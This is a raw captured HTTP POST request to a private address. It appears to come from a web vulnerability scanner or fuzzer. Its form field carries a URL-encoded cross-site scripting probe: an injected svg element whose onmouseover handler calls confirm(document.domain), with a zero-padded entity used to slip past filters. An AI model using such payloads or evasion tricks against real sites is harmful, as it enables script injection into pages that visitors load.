POST / HTTP/1.1
Host: 10.10.3.128:2280
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

--8341955aac0088cd5d9220b6d1b185ffa5f69a4f789eaa2623ba65ca777c
Content-Disposition: form-data; name="36a1a9e678"

%22%3E%3Csvg+onmouseover%3D%22confirm%26%230000000040document.domain%29
--8341955aac0088cd5d9220b6d1b185ffa5f69a4f789eaa2623ba65ca777c--

